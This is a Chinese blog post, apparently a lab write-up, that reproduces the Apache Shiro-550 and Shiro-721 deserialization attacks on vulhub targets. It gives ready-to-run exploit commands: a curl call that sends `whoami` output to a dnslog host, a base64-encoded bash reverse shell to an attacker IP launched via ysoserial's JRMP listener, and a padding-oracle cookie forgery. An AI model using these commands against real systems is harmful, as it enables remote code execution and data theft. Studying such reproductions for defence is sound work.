shiro漏洞复现

最新推荐文章于 2024-03-29 06:30:00 发布
最新推荐文章于 2024-03-29 06:30:00 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/129719365
版权

shiro漏洞

Shiro简介

Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理, 可用于保护任何应用程序的安全。近年来护网中较多的漏洞。
Shiro提供了应用程序安全性API来执行以下方面:
1)身份验证:证明用户身份,通常称为用户"登录";
2)授权:访问控制;
3)密码术:保护或隐藏数据以防窥视;
4)会话管理:每个用户的时间敏感状态。
上述四个方面也被称为应用程序安全性的四个基石。

shiro历史漏洞

漏洞发现

Shiro组件识别:在访问及登录时抓包,如果响应头 set-cookie 中显示 rememberMe=deleteMe ,说明使用了 Shiro 组件。

请添加图片描述

或者fofa语法查找:

header="rememberme=deleteMe" header="shiroCookie"

shiro-550漏洞复现

漏洞原因

Apache Shiro 框架提供了记住密码的功能( RememberMe ),用户登录成功后用户信息会经过加密编 码后存储在 cookie 中。在 Cookie 读取过程中有用 AES 对 Cookie 值解密的过程,对于 AES 这类对 称加密算法,一旦秘钥泄露加密便形同虚设。若秘钥可控,同时 Cookie 值是由攻击者构造的恶意 Payload ,就可以将流程走通,触发危险的 Java 反序列化,从而导致远程命令执行漏洞。

漏洞搭建

进入vulhub启动2016那个靶场。

工具链接 https://github.com/insightglacier/Shiro_exploit
复现过程

1.访问页面,抓包发现是shiro组件,和上面的检验方式一样。

请添加图片描述

2.利用脚本进行检验是否存在默认key的值,发现是kphaaa==

请添加图片描述

请添加图片描述

3.利用脚本去查看是否可以请求到dnslog平台,用curl 请求,带出whoami的结果,发现可以带出root,说明存在对应的漏洞。

python shiro_exploit.py -u http://target/ -t 3 -p "curl `whoami`.dnslog.cn" -k "kPH+bIxk5D2deZiIxcaaaA=="

请添加图片描述

请添加图片描述

4.对反弹的shell命令进行base编码,然后通过ysoserial中的JRMP监听模块监听11111端口,并执行反弹shell。

//编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi85OTk3IDA+JjE=}|{base64,-d}|{bash,-i}

//命令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 11111 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi85OTk3IDA+JjE=}|{base64,-d}|{bash,-i}"

请添加图片描述

5.执行shiro.py脚本生成cookie,在shiro.py脚本中要修改key的值为自己爆破出来的Key值。

python2 shiro.py 192.168.3.18

请添加图片描述

请添加图片描述

6.然后用Bp随意抓登陆包,把cookie放上去发送,监听9999端口,会反弹回来shell。

请添加图片描述

请添加图片描述

7.也可以直接在shiro_exp的脚本中直接反弹shell。

python shiro_exploit.py -u http://192.168.42.132:8080/doLogin -t 3 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQyLjEzMi85OTk3IDA+JjE=}|{base64,-d}|{bash,-i}" -k "kPH+bIxk5D2deZiIxcaaaA=="

请添加图片描述

shiro-721漏洞复现

漏洞原因

由于 Apache Shiro cookie 中通过 AES-128-CBC 模式加密的 rememberMe 字段存 在问题,用户可通 过 Padding Oracle 加密生成的攻击代码来构造恶意的 rememberMe 字段,并重新请求网站,进行反序 列化攻击,最终导致任意代码执行。但这个漏洞需要登录成功,获取到remember cookie 才可以利用。

复现过程

1.访问靶场,点击登录,勾选记住密码,使用bp抓包,查看登录成功返回的remember cookie值。

请添加图片描述

请添加图片描述

2.利用dnslog 获取域名,用ysoserial工具生成payload。

java -jar ysoserial.jar CommonsBeanutils1 "ping xtevgi.dnslog.cn" > payload.class

请添加图片描述

请添加图片描述

3.利用脚本进行padding oracle attack,生成恶意的rememberme cookie,但是爆破的时间很长,大概需要几个小时。最后查看dnslog平台,发现会请求到。

python2 shiro_exp.py http://192.168.42.132:7777/ Ghj+9Zi5WrngZfhD5SPOvkVXYZJuPSxWNl7Tq2GHouXA1j6Uyw2NzTX6pAj46hUomHFmSuM8qoX2/qQIpV7pRdw5lc8c5lV4bkiIPJnQ1sAHJzM85IWsL3BOEU6xWVd5kcIsD0HHSiD+a+NhXi6xw0ocpVu28muReuoBKZAcaNhnTI8r6uXDgueAWFWpHSL0TlYMkawIogG7cfx7TOSPgaaOOQSgTkeQgBJPlpeB+5V87yyrMvoRlB3drWhy7wLBRPN/7ySXzJTxre0C2FNeSmAG7D9LoPXJFhRAHcX3m0oUo6akgSZj23FM7y30b7qLurcDgv9+DT6swRj0hzvgIBotjWG/Qq1L1EiBcvMeipwDU2/m6hp5lCp6dRPPjpDIMvsPeR18rElIyo6La+X1dLBKIaHSmMhDHpWHQjjwdMZINQNRE20gP2XWj2AmMIvqILUKI/K5keCjsLOinUy8zZ5EQQHMHIR8y6IWWO6wqYF6/VNC0qSQHNb0xPl08rXp payload.class

爆破几个小时得出来的cookie请添加图片描述

4.重新访问靶场,用bp抓包,把爆破到的cookie放到立马进行重放,发现dnslog会被请求到,说明被访问了,按照这种方式可以构造其他恶意请求进行攻击。

在这里插入图片描述
总结:721漏洞攻击的话太鸡肋,手工过程太复杂。

00zzz
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro漏洞检测工具
08-10
shiro漏洞检测工具,找了一个18M左右的不好用,经验证这个好用,不会报找不到类错误。
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro反序列化漏洞
m0_67391683的博客
08-24 353
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞
漏洞】浙大恩特客户资源管理系统 Quotegask_editAction-sql接口处存在SQL注入漏洞
最新发布
weixin_52204925的博客
03-29 506
浙大恩特客户资源管理系统Quotegask_editAction-sql接口处存在SQL注入漏洞,恶意攻击者可通过此漏洞获取服务器的敏感信息,最终可能会导致服务器失陷
详细shiro漏洞及利用方法(CVE-2016-4437)
热门推荐
dreamthe的博客
04-26 2万+
该篇文章比较详细的介绍shiro漏洞利用,无论是shiro漏洞图形化工具利用,还是shiro漏洞结合JRMP我觉得比大多数文章都详细,如果你对网上结合JRMP反弹shell不是很明白,非常推荐来看看这篇文章。另外漏洞利用工程中用到的工具以及代码都上传到百度网盘,供大家使用,在文章最后哦。
Shiro框架漏洞分析与
未完成的歌~的博客
05-15 3725
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
Shiro框架漏洞详解及
m0_64481831的博客
03-07 1345
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
Shiro漏洞
懂进攻知防守
07-29 1358
Apache Shiro 框架提供了记住密码的功能( RememberMe ),关闭浏览器再次访问时无需再登录即可访问。用户登录成功后用户信息会经过加密编码后存储在 cookie中。在 Cookie 读取过程中有用 AES 对 Cookie 值解密的过程,对于 AES 这类对称加密算法,一旦秘钥泄露加密便形同虚设。......
Shiro反序列化漏洞原理详解及
Javachichi的博客
05-06 855
生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传。在登录时勾选Remember me,burp抓包可以看到,响应包的set-cookie字段存在rememberMe。删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送。AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心。
漏洞Shiro 反序列化漏洞
zkaqlaoniao的博客
11-09 1510
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
apche shiro漏洞检测和利用工具
07-30
Shiro命令执行工具 V1.0 提供默认Key的查询 摘取xray高级版 xray利用链 100+个KEY已注释!!!! 声明:本工具仅供学习使用,禁止任何用于非法途径,如果使用该工具参与非法活动与本人无任何关系,本人不承担任何...
漏洞Shiro 反序列化漏洞
2301_80115097的博客
11-08 1472
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
shiro漏洞及其攻击流量分析
akxnxbshai的博客
04-09 5035
分析一下shiro的攻击流量特征。
shiro反序列化漏洞
qq_41696518的博客
06-27 1338
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
shiro反序列化漏洞的原理和
顺其自然~专栏
03-09 484
Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞
Shiro历史漏洞 - Shiro-550
HAKUNAMATATATTA的博客
01-03 1847
Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。Shiro提供了应用程序安全性API来执行以下方面:1)身份验证:证明用户身份,通常称为用户"登录";2)授权:访问控制;3)密码术:保护或隐藏数据以防窥视;4)会话管理:每个用户的时间敏感状态。上述四个方面也被称为应用程序安全性的四个基石。
shiro550
09-06
您好!对于shiro550漏洞,您可以按照以下步骤进行操作: 1. 确定您的环境:首先,您需要一个Java开发环境(如JDK)以及一个Web服务器(如Tomcat)来运行应用程序。 2. 下载Shiro:从Apache Shiro官方网站(https://shiro.apache.org/)下载最新的Shiro版本,并解压到您的项目目录中。 3. 配置Shiro:在您的项目中,创建一个shiro.ini文件来配置Shiro的安全设置。您可以根据需要配置认证策略、授权策略等。 4. 编写漏洞代码:在您的应用程序中创建一个可供攻击者利用的漏洞代码。此漏洞可能涉及未正确处理用户输入、缺乏访问控制或其他常见安全问题。 5. 运行应用程序:将您的应用程序部署到Web服务器上,并启动服务器。确保应用程序可以正常访问,并且漏洞代码可以被触发。 请注意,shiro550漏洞可能涉及到非法攻击行为,这是非法且不道德的。在进行任何安全测试之前,请确保您已经获得了适当的授权,并仅在合法的测试环境中进行操作。 希望以上信息能对您有所帮助!如果您有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值